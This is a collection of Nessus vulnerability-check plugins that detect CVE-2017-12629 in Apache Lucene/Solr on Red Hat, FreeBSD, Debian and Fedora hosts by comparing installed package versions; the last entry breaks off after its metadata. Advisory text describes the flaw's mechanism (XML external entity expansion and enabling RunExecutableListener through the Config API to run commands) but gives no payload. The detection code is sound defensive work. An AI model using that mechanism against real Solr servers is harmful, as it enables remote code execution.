    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2017:3123. The text 
    # itself is copyright (C) Red Hat, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(104457);
      script_version("3.12");
      script_cvs_date("Date: 2019/10/24 15:35:43");
    
      script_cve_id("CVE-2017-12629");
      script_xref(name:"RHSA", value:"2017:3123");
      script_xref(name:"IAVA", value:"2017-A-0319");
    
      script_name(english:"RHEL 6 / 7 : JBoss EAP (RHSA-2017:3123)");
      script_summary(english:"Checks the rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Red Hat host is missing one or more security updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "A security update is now available for Red Hat JBoss Enterprise
    Application Platform 7 for Red Hat Enterprise Linux 6 and 7.
    
    Red Hat Product Security has rated this update as having a security
    impact of Moderate. A Common Vulnerability Scoring System (CVSS) base
    score, which gives a detailed severity rating, is available for each
    vulnerability from the CVE link(s) in the References section.
    
    [Updated 6th November 2017] Previously, this erratum was marked as
    having a security impact of Critical. This was incorrect; Red Hat
    JBoss Enterprise Application Platform 7 was affected with a security
    impact of Moderate. This advisory has been updated to that effect.
    
    Red Hat JBoss Enterprise Application Platform is a platform for Java
    applications based on the JBoss Application Server.
    
    This asynchronous patch is a security update for lucene package in Red
    Hat JBoss Enterprise Application Platform 7.0.8.
    
    Security Fix(es) :
    
    * It was found that Apache Lucene would accept an object from an
    unauthenticated user that could be manipulated through subsequent post
    requests. An attacker could use this flaw to assemble an object that
    could permit execution of arbitrary code if the server enabled Apache
    Solr's Config API. (CVE-2017-12629)
    
    For more information regarding CVE-2017-12629, see the article linked
    in the references section."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/vulnerabilities/CVE-2017-12629"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/documentation/en-us/"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/errata/RHSA-2017:3123"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2017-12629"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-analyzers-common");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-backward-codecs");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-core");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-facet");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-misc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-queries");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-queryparser");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-solr");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/11/06");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/08");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_set_attribute(attribute:"stig_severity", value:"I");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Red Hat Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
    os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
    os_ver = os_ver[1];
    if (! preg(pattern:"^(6|7)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 6.x / 7.x", "Red Hat " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
    
    yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
    if (!empty_or_null(yum_updateinfo)) 
    {
      rhsa = "RHSA-2017:3123";
      yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
      if (!empty_or_null(yum_report))
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_HOLE,
          extra      : yum_report 
        );
        exit(0);
      }
      else
      {
        audit_message = "affected by Red Hat security advisory " + rhsa;
        audit(AUDIT_OS_NOT, audit_message);
      }
    }
    else
    {
      flag = 0;
    
      if (! (rpm_exists(release:"RHEL6", rpm:"jbossas-welcome-content-eap") || rpm_exists(release:"RHEL7", rpm:"jbossas-welcome-content-eap"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, "JBoss EAP");
    
      if (rpm_check(release:"RHEL6", reference:"eap7-lucene-analyzers-common-5.3.1-4.redhat_2.1.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"eap7-lucene-backward-codecs-5.3.1-4.redhat_2.1.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"eap7-lucene-core-5.3.1-4.redhat_2.1.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"eap7-lucene-facet-5.3.1-4.redhat_2.1.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"eap7-lucene-misc-5.3.1-4.redhat_2.1.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"eap7-lucene-queries-5.3.1-4.redhat_2.1.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"eap7-lucene-queryparser-5.3.1-4.redhat_2.1.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"eap7-lucene-solr-5.3.1-4.redhat_2.1.ep7.el6")) flag++;
    
      if (rpm_check(release:"RHEL7", reference:"eap7-lucene-analyzers-common-5.3.1-4.redhat_2.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-lucene-backward-codecs-5.3.1-4.redhat_2.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-lucene-core-5.3.1-4.redhat_2.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-lucene-facet-5.3.1-4.redhat_2.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-lucene-misc-5.3.1-4.redhat_2.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-lucene-queries-5.3.1-4.redhat_2.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-lucene-queryparser-5.3.1-4.redhat_2.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"eap7-lucene-solr-5.3.1-4.redhat_2.1.ep7.el7")) flag++;
    
      if (flag)
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_HOLE,
          extra      : rpm_report_get() + redhat_report_package_caveat()
        );
        exit(0);
      }
      else
      {
        tested = pkg_tests_get();
        if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
        else audit(AUDIT_PACKAGE_NOT_INSTALLED, "eap7-lucene-analyzers-common / eap7-lucene-backward-codecs / etc");
      }
    }
    
  • NASL family: CGI abuses
    NASL id: SOLR_7_1_0.NASL
    description: The version of Apache Solr running on the remote web server is affected by multiple vulnerabilities as referenced in the advisory.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 104353
    published: 2017-11-02
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/104353
    title: Apache Solr 5.x < 5.5.5 / 6.x < 6.6.2 / 7.x < 7.1.0 Multiple Vulnerabilities
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(104353);
      script_version("1.6");
      script_cvs_date("Date: 2019/11/12");
    
      script_cve_id("CVE-2017-12629");
      script_bugtraq_id(101261);
      script_xref(name:"IAVA", value:"2017-A-0319");
    
      script_name(english:"Apache Solr 5.x < 5.5.5 / 6.x < 6.6.2 / 7.x < 7.1.0 Multiple Vulnerabilities");
      script_summary(english:"Checks version of Solr");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server contains a Java application that is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Apache Solr running on the remote web server is
    affected by multiple vulnerabilities as referenced in the advisory.");
      script_set_attribute(attribute:"see_also", value:"http://lucene.apache.org/solr/news.html");
      script_set_attribute(attribute:"see_also", value:"https://seclists.org/oss-sec/2017/q4/105");
      # https://lucene.apache.org/core/5_5_5/changes/Changes.html#v5.5.5.bug_fixes
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?552cc7b7");
      # https://lucene.apache.org/core/5_5_5/changes/Changes.html#v5.5.5.bug_fixeshttps://lucene.apache.org/core/6_6_2/changes/Changes.html#v6.6.2.bug_fixes
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?15df27f7");
      # https://lucene.apache.org/core/5_5_5/changes/Changes.html#v5.5.5.bug_fixeshttps://lucene.apache.org/core/6_6_2/changes/Changes.html#v6.6.2.bug_fixeshttps://lucene.apache.org/core/7_1_0/changes/Changes.html#v7.1.0.bug_fixes
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f91188b1");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Apache Solr version 5.5.5 / 6.6.2 / 7.1.0 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/17");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/10/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/02");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:solr");
      script_set_attribute(attribute:"stig_severity", value:"I");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("solr_detect.nbin");
      script_require_keys("installed_sw/Apache Solr");
      script_require_ports("Services/www", 8983);
    
      exit(0);
    }
    
    include("vcf.inc");
    include("http.inc");
    
    app = "Apache Solr";
    get_install_count(app_name:app,exit_if_zero:TRUE);
    port    = get_http_port(default:8983);
    
    app_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);
    vcf::check_granularity(app_info:app_info, sig_segments:3);
    
    constraints = [
      {"min_version" : "5.5.0",  "max_version" : "5.5.4", "fixed_version" : "5.5.5" },
      {"min_version" : "6.0.0",  "max_version" : "6.6.1", "fixed_version" : "6.6.2" },
      {"min_version" : "7.0.0",  "max_version" : "7.0.1", "fixed_version" : "7.1.0" }
    ];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);
    
  • NASL family: FreeBSD Local Security Checks
    NASL id: FREEBSD_PKG_E837390D0CEB46B89B3229C1195F5DC7.NASL
    description: Solr developers report : Lucene XML parser does not explicitly prohibit doctype declaration and expansion of external entities which leads to arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions. Solr 'RunExecutableListener' class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such listener can be enabled with any parameters just by using Config API with add-listener command.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 103843
    published: 2017-10-16
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/103843
    title: FreeBSD : solr -- Code execution via entity expansion (e837390d-0ceb-46b8-9b32-29c1195f5dc7)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the FreeBSD VuXML database :
    #
    # Copyright 2003-2018 Jacques Vidrine and contributors
    #
    # Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
    # HTML, PDF, PostScript, RTF and so forth) with or without modification,
    # are permitted provided that the following conditions are met:
    # 1. Redistributions of source code (VuXML) must retain the above
    #    copyright notice, this list of conditions and the following
    #    disclaimer as the first lines of this file unmodified.
    # 2. Redistributions in compiled form (transformed to other DTDs,
    #    published online in any format, converted to PDF, PostScript,
    #    RTF and other formats) must reproduce the above copyright
    #    notice, this list of conditions and the following disclaimer
    #    in the documentation and/or other materials provided with the
    #    distribution.
    # 
    # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
    # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
    # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
    # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
    # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
    # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
    # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
    # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
    # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
    # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(103843);
      script_version("3.9");
      script_cvs_date("Date: 2019/04/10 16:10:17");
    
      script_cve_id("CVE-2017-12629");
      script_xref(name:"IAVA", value:"2017-A-0319");
    
      script_name(english:"FreeBSD : solr -- Code execution via entity expansion (e837390d-0ceb-46b8-9b32-29c1195f5dc7)");
      script_summary(english:"Checks for updated packages in pkg_info output");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote FreeBSD host is missing one or more security-related
    updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Solr developers report :
    
    Lucene XML parser does not explicitly prohibit doctype declaration and
    expansion of external entities which leads to arbitrary HTTP requests
    to the local SOLR instance and to bypass all firewall restrictions.
    
    Solr 'RunExecutableListener' class can be used to execute arbitrary
    commands on specific events, for example after each update query. The
    problem is that such listener can be enabled with any parameters just
    by using Config API with add-listener command."
      );
      # http://lucene.472066.n3.nabble.com/Re-Several-critical-vulnerabilities-discovered-in-Apache-Solr-XXE-amp-RCE-td4358308.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?58e607db"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://marc.info/?l=apache-announce&m=150786685013286"
      );
      # https://vuxml.freebsd.org/freebsd/e837390d-0ceb-46b8-9b32-29c1195f5dc7.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?74838017"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:apache-solr");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/13");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/10/13");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/10/16");
      script_set_attribute(attribute:"stig_severity", value:"I");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"FreeBSD Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("freebsd_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
    if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (pkg_test(save_report:TRUE, pkg:"apache-solr>=5.1<=6.6.1")) flag++;
    if (pkg_test(save_report:TRUE, pkg:"apache-solr>=7.0.0<7.1")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL family: Debian Local Security Checks
    NASL id: DEBIAN_DSA-4124.NASL
    description: Two vulnerabilities have been found in Solr, a search server based on Lucene, which could result in the execution of arbitrary code or path traversal.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 107024
    published: 2018-02-28
    reporter: This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/107024
    title: Debian DSA-4124-1 : lucene-solr - security update
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-4124. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(107024);
      script_version("3.5");
      script_cvs_date("Date: 2019/04/05 23:25:05");
    
      script_cve_id("CVE-2017-12629", "CVE-2017-3163");
      script_xref(name:"DSA", value:"4124");
      script_xref(name:"IAVA", value:"2017-A-0319");
    
      script_name(english:"Debian DSA-4124-1 : lucene-solr - security update");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Two vulnerabilities have been found in Solr, a search server based on
    Lucene, which could result in the execution of arbitrary code or path
    traversal."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security-tracker.debian.org/tracker/source-package/lucene-solr"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://packages.debian.org/source/jessie/lucene-solr"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://packages.debian.org/source/stretch/lucene-solr"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.debian.org/security/2018/dsa-4124"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the lucene-solr packages.
    
    For the oldstable distribution (jessie), these problems have been
    fixed in version 3.6.2+dfsg-5+deb8u1.
    
    For the stable distribution (stretch), these problems have been fixed
    in version 3.6.2+dfsg-10+deb9u1."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:lucene-solr");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:9.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2018/02/27");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/02/28");
      script_set_attribute(attribute:"stig_severity", value:"I");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"8.0", prefix:"liblucene3-contrib-java", reference:"3.6.2+dfsg-5+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"liblucene3-java", reference:"3.6.2+dfsg-5+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"liblucene3-java-doc", reference:"3.6.2+dfsg-5+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"libsolr-java", reference:"3.6.2+dfsg-5+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"solr-common", reference:"3.6.2+dfsg-5+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"solr-jetty", reference:"3.6.2+dfsg-5+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"solr-tomcat", reference:"3.6.2+dfsg-5+deb8u1")) flag++;
    if (deb_check(release:"9.0", prefix:"liblucene3-contrib-java", reference:"3.6.2+dfsg-10+deb9u1")) flag++;
    if (deb_check(release:"9.0", prefix:"liblucene3-java", reference:"3.6.2+dfsg-10+deb9u1")) flag++;
    if (deb_check(release:"9.0", prefix:"liblucene3-java-doc", reference:"3.6.2+dfsg-10+deb9u1")) flag++;
    if (deb_check(release:"9.0", prefix:"libsolr-java", reference:"3.6.2+dfsg-10+deb9u1")) flag++;
    if (deb_check(release:"9.0", prefix:"solr-common", reference:"3.6.2+dfsg-10+deb9u1")) flag++;
    if (deb_check(release:"9.0", prefix:"solr-jetty", reference:"3.6.2+dfsg-10+deb9u1")) flag++;
    if (deb_check(release:"9.0", prefix:"solr-tomcat", reference:"3.6.2+dfsg-10+deb9u1")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-005F8F7F7D.NASL
    description: Security fix for CVE-2017-12629. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-11-02
    plugin id: 104343
    published: 2017-11-02
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/104343
    title: Fedora 25 : lucene (2017-005f8f7f7d)
    code:
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Fedora Security Advisory FEDORA-2017-005f8f7f7d.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(104343);
      script_version("3.9");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
    
      script_cve_id("CVE-2017-12629");
      script_xref(name:"FEDORA", value:"2017-005f8f7f7d");
      script_xref(name:"IAVA", value:"2017-A-0319");
    
      script_name(english:"Fedora 25 : lucene (2017-005f8f7f7d)");
      script_summary(english:"Checks rpm output for the updated package.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Fedora host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Security fix for CVE-2017-12629
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Fedora update system website.
    Tenable has attempted to automatically clean and format it as much as
    possible without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bodhi.fedoraproject.org/updates/FEDORA-2017-005f8f7f7d"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected lucene package."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:lucene");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:25");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/11/01");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/02");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_set_attribute(attribute:"stig_severity", value:"I");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Fedora Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
    os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
    os_ver = os_ver[1];
    if (! preg(pattern:"^25([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 25", "Fedora " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
    
    
    flag = 0;
    if (rpm_check(release:"FC25", reference:"lucene-5.5.0-5.fc25")) flag++;
    
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_HOLE,
        extra      : rpm_report_get()
      );
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "lucene");
    }
    
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-9B3E2904BF.NASL
    description: Security fix for CVE-2017-12629. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
